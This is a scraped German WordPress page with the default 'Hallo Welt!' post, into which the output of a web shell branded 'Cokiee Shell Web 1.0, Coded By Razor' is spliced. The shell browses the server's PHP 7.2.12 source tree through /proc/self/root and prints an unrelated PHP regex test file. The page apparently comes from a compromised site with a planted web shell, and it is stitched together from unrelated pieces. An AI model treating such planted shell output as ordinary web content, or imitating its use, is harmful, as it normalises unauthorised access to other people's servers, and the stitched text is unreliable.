Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/pcre/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/pcre/tests/bug41638.phpt |
--TEST-- Bug #41638 (pcre 7.0 regression) --FILE-- <?php $str = "repeater id='loopt' dataSrc=subject colums=2"; preg_match_all("/(['\"])((.*(\\\\\\1)*)*)\\1/sU",$str,$str_instead); print_r($str_instead); // these two are from Magnus Holmgren (extracted from a pcre-dev mailing list post) preg_match_all("/(['\"])((?:\\\\\\1|.)*)\\1/sU", $str, $str_instead); print_r($str_instead); preg_match_all("/(['\"])(.*)(?<!\\\\)\\1/sU", $str, $str_instead); print_r($str_instead); ?> --EXPECT-- Array ( [0] => Array ( [0] => 'loopt' ) [1] => Array ( [0] => ' ) [2] => Array ( [0] => loopt ) [3] => Array ( [0] => t ) [4] => Array ( [0] => ) ) Array ( [0] => Array ( [0] => 'loopt' ) [1] => Array ( [0] => ' ) [2] => Array ( [0] => loopt ) ) Array ( [0] => Array ( [0] => 'loopt' ) [1] => Array ( [0] => ' ) [2] => Array ( [0] => loopt ) )
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare